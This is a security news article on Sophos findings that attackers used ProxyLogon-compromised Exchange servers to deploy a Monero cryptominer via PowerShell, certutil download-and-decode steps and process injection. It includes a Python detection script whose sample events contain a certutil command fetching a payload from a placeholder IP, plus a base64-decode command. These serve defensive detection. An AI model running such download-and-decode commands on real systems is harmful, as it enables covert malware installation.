Fallout from ProxyLogon Attack Continues

Saturday, April 17th, 2021

Researchers from Sophos have discovered threat actors targeting compromised Exchange servers in order to host malicious Monero cryptominers. The payload for this attack was itself hosted on a compromised Exchange server. Researchers said they detect the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of indicators of compromise on the SophosLabs GitHub page to help organizations recognize whether they have been attacked in this way.

The attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path (/owa/auth), according to the report. On closer inspection, the .zip file was not a compressed archive at all but a batch script, which then invoked the certutil.exe program built into Windows to download two additional files, win_s.zip and win_d.zip, which also were not compressed.

The first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.

The batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.

The executable in the attack appears to contain a modified version of a tool publicly available on GitHub called PEx64-Injector, which is described on its GitHub page as having the ability to “migrate any x64 exe to any x64 process” with “no administrator privileges required,” according to the report.

Once the file runs on an infected system, it temporarily extracts the contents of the QuickCPU.dat file, which include an installer for the cryptominer and its configuration, to the filesystem. It then configures the miner, injects it into a running process, and quits, according to the report. “The batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,” Brandt wrote.
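Two defender-side checks that follow from the chain described above, written here as an added example rather than code from the Sophos report: a content check that catches a “.zip” which is really a script or base64 blob, and a scan of process-creation records for certutil being used to fetch a URL or decode base64. The sample events, file paths and the 203.0.113.5 address are constructed assumptions, not indicators from the report.

```python
import re

# Constructed sample process-creation records (not taken from the Sophos
# report); field names loosely follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/owa/auth/win_s.zip C:\Temp\QuickCPU.b64"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -decode C:\Temp\QuickCPU.b64 C:\Temp\QuickCPU.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify -urlfetch C:\Certs\corp.cer"},  # benign control
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Temp\notes.txt"},  # unrelated process
]

ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")

def is_real_zip(data: bytes) -> bool:
    """True if the bytes start with a ZIP local-file, end-of-central-dir or spanned signature."""
    return data[:4] in ZIP_MAGICS

def disguised_archive(filename: str, data: bytes) -> bool:
    """Flag a file whose .zip name does not match its content, as with the
    win_r.zip batch script and the base64 'archives' described in the article."""
    return filename.lower().endswith(".zip") and not is_real_zip(data)

def suspicious_certutil(event: dict) -> list:
    """Return the reasons an event looks like certutil used as a downloader
    or base64 decoder; an empty list means nothing was flagged."""
    reasons = []
    if not event["Image"].lower().endswith("certutil.exe"):
        return reasons
    cmd = event["CommandLine"].lower()
    if "-urlcache" in cmd and re.search(r"https?://", cmd):
        reasons.append("certutil fetching a remote URL")
    if "-decode" in cmd:
        reasons.append("certutil decoding base64 to a file")
    if re.search(r"/owa/auth/", cmd):
        reasons.append("payload path under an Exchange OWA logon directory")
    return reasons

def scan(events) -> list:
    """Pair each flagged event's command line with the reasons it was flagged."""
    return [(e["CommandLine"], r) for e in events if (r := suspicious_certutil(e))]

if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_EVENTS):
        print(cmd, "->", "; ".join(reasons))
    print(disguised_archive("win_r.zip", b"@echo off\r\ncertutil ..."))  # constructed script body
```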

Researchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.

Further Reading:

Indicators of Compromise (IOCs)
